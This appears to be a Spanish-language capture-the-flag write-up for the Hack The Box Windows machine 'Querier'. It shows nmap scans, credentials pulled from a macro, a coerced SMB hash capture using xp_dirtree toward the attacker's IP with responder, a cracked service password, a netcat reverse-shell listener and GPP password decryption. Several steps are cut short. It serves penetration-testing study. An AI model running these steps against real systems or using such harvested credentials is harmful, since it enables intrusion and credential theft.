Querier
| Sistema operativo | Dificultad | Fecha de Lanzamiento | Creador |
|---|---|---|---|
| Windows | Medium | 16 Febrero 2019 | mrh4sh & egre55 |
Reconocimiento
Lanzamos una traza ICMP a la máquina objetivo para comprobar que tengamos conectividad.
Enumeración inicial
Realizamos un escaneo con nmap para descubrir que puertos TCP se encuentran abiertos en la máquina víctima.
nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts 10.10.10.125 -vvv
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-04 19:40 -03
Initiating SYN Stealth Scan at 19:40
Scanning 10.10.10.125 [65535 ports]
Discovered open port 445/tcp on 10.10.10.125
Discovered open port 135/tcp on 10.10.10.125
Discovered open port 139/tcp on 10.10.10.125
Discovered open port 49671/tcp on 10.10.10.125
Discovered open port 49667/tcp on 10.10.10.125
Discovered open port 49665/tcp on 10.10.10.125
Discovered open port 49669/tcp on 10.10.10.125
Discovered open port 49670/tcp on 10.10.10.125
Discovered open port 49664/tcp on 10.10.10.125
Discovered open port 49668/tcp on 10.10.10.125
Discovered open port 1433/tcp on 10.10.10.125
Discovered open port 49666/tcp on 10.10.10.125
Discovered open port 5985/tcp on 10.10.10.125
Discovered open port 47001/tcp on 10.10.10.125
Completed SYN Stealth Scan at 19:41, 16.42s elapsed (65535 total ports)
Nmap scan report for 10.10.10.125
Host is up, received user-set (0.22s latency).
Scanned at 2025-02-04 19:40:50 -03 for 16s
Not shown: 65505 closed tcp ports (reset), 16 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49668/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
49670/tcp open unknown syn-ack ttl 127
49671/tcp open unknown syn-ack ttl 127
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 16.50 seconds
Raw packets sent: 79944 (3.518MB) | Rcvd: 68418 (2.737MB)
Lanzamos una serie de script básicos de enumeración propios de nmap, para conocer la versión y servicio que esta corriendo bajo los puertos.
nmap -sCV -p135,139,445,1433,5985,47001,49664,49665,49666,49667,49668,49669,49670,49671 -oN servicesScan 10.10.10.125 -vvv
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-04 19:42 -03
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:42
Completed NSE at 19:42, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:42
Completed NSE at 19:42, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:42
Completed NSE at 19:42, 0.00s elapsed
Initiating Ping Scan at 19:42
Scanning 10.10.10.125 [4 ports]
Completed Ping Scan at 19:42, 0.17s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:42
Completed Parallel DNS resolution of 1 host. at 19:42, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:42
Scanning 10.10.10.125 [14 ports]
Discovered open port 135/tcp on 10.10.10.125
Discovered open port 445/tcp on 10.10.10.125
Discovered open port 139/tcp on 10.10.10.125
Discovered open port 5985/tcp on 10.10.10.125
Discovered open port 47001/tcp on 10.10.10.125
Discovered open port 1433/tcp on 10.10.10.125
Discovered open port 49668/tcp on 10.10.10.125
Discovered open port 49666/tcp on 10.10.10.125
Discovered open port 49665/tcp on 10.10.10.125
Discovered open port 49669/tcp on 10.10.10.125
Discovered open port 49670/tcp on 10.10.10.125
Discovered open port 49667/tcp on 10.10.10.125
Discovered open port 49671/tcp on 10.10.10.125
Discovered open port 49664/tcp on 10.10.10.125
Completed SYN Stealth Scan at 19:42, 0.33s elapsed (14 total ports)
Initiating Service scan at 19:42
Scanning 14 services on 10.10.10.125
Service scan Timing: About 50.00% done; ETC: 19:44 (0:00:56 remaining)
Completed Service scan at 19:43, 56.16s elapsed (14 services on 1 host)
NSE: Script scanning 10.10.10.125.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:43
Completed NSE at 19:43, 9.28s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:43
Completed NSE at 19:43, 0.65s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:43
Completed NSE at 19:43, 0.01s elapsed
Nmap scan report for 10.10.10.125
Host is up, received echo-reply ttl 127 (0.15s latency).
Scanned at 2025-02-04 19:42:22 -03 for 66s
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2017 14.00.1000.00; RTM
|_ssl-date: 2025-02-04T22:43:28+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-02-04T22:32:47
| Not valid after: 2055-02-04T22:32:47
| MD5: ef54:f6c5:8983:dfd8:ede9:87ce:3d7f:a0f1
| SHA-1: 2384:9561:cca0:c8ac:b8ef:fd48:8ead:3723:57a9:6690
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQXfkZtIMUyqdJthLo4Kxr5TANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjUwMjA0MjIzMjQ3WhgPMjA1NTAyMDQyMjMyNDdaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBANAbElnH
| BUt09K11wCBBrHj2DeyawOg78LkgpZweMQ9fftPGxvA3p2WalNrWbam5KvXjU5pP
| 8BjZyw/z1kHmwPpSRRfgKPkRhAX6U07Ss0fgXJbfQRuFFAv+10mjEtF5TxWxzBO6
| u9xf8uHB+Ag0xWW9g7mv1rYgROttNR4rnG83V+L3UlQL0QZVuk9xtfdOCMhGah8n
| YtUuTxbuyfsdhoos+cqtfoYa1glF7mHS/mFmzWM1nBOZyVpNC2b+VGkHsEGvUKv2
| 0SnphLQlQuOH0lQP7Gp5Y/yVlKs2uxOFG38REwLShmfgmJ5ByDZ+rwAEjPH7Al8v
| q3Q3smMTyITIjhUCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAcmoH7/+/yUcD+cfk
| MuJyVNdhzfZ69GL4bEPktYQSSWb9r7cBuBt2RvIqnyMtZoSKOYTQB7MH30QYdhv4
| +qB9OXnjLlQJs4NcrNT9D/XEz51eSrlAZtt3pWAifRXsOj3qzZprsc1JPfcImh93
| v9DAmdZqAeP38Qtqj7P/XzRVn9X/XUVhXeUa0XVGDQD1opkh0phlkBNsvVO1zfYo
| 82bYDcAK0zB6twM1K62xGZcTnbE4D5BUbWpyV3vzajxlhFztAYFtLWMYs20myNG9
| hlU1ZFTfBm7ddeKp1wbIsn2GgagXTaRCpAPyz7dTvXL0aNeHTsf1DGimFmx2Flk0
| cmptpA==
|_-----END CERTIFICATE-----
| ms-sql-info:
| 10.10.10.125:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.10.125:1433:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: QUERIER
| DNS_Domain_Name: HTB.LOCAL
| DNS_Computer_Name: QUERIER.HTB.LOCAL
| DNS_Tree_Name: HTB.LOCAL
|_ Product_Version: 10.0.17763
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-02-04T22:43:20
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 10624/tcp): CLEAN (Couldn't connect)
| Check 2 (port 35010/tcp): CLEAN (Couldn't connect)
| Check 3 (port 40571/udp): CLEAN (Timeout)
| Check 4 (port 46213/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:43
Completed NSE at 19:43, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:43
Completed NSE at 19:43, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:43
Completed NSE at 19:43, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.19 seconds
Raw packets sent: 18 (768B) | Rcvd: 15 (644B)
Explotación inicial
SMB (445)
Si accedemos a los macros, encontramos un macro que realiza se conecta a la base de datos volume.
reporting:PcwTWTHRwryjc$c6
Si intentamos habilitar xp_cmdshell, no lanza un error indicando que no tenemos permisos suficientes.
Esto se debe a que no tenemos el ROL de sysadmin.
Pero igual podemos intentar leer un archivo de un recurso compartido y obtener el hash NetLMv2,
Iniciamos responder.
responder -I tun0
ejecutamos el siguiente comando en la consola de SQL.
exec xp_dirtree '\\10.10.14.30\share\file'
Y de esta forma logramos capturar el hash.
Guardamos el hash en un archivo y lo crackeamos con John.
Genial, obtuvimos las credenciales del usuario mssql-svc.
mssql-svc:corporate568
Enumeración / Movimiento lateral
Nos conectamos a la base de datos.
Lanzamos una reverse shell.
Creamos un recursos compartido por SMB para compartir el binario de netcat nc.exe.
impacket-smbserver -smb2support share .
Nos ponemos en escucha con netcat por el puerto 4444.
rlwrap nc -lnvp 4444
Ejecutamos el siguiente comando.
Ganamos acceso al sistema.
Leemos la flag de user.txt
Elevación de privilegios
Creamos un servidor HTTP con Python para
python3 -m http.server 80
Desencriptamos la contraseña.
gpp-decrypt CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVD
Post Explotación
Leemos la flag de root.
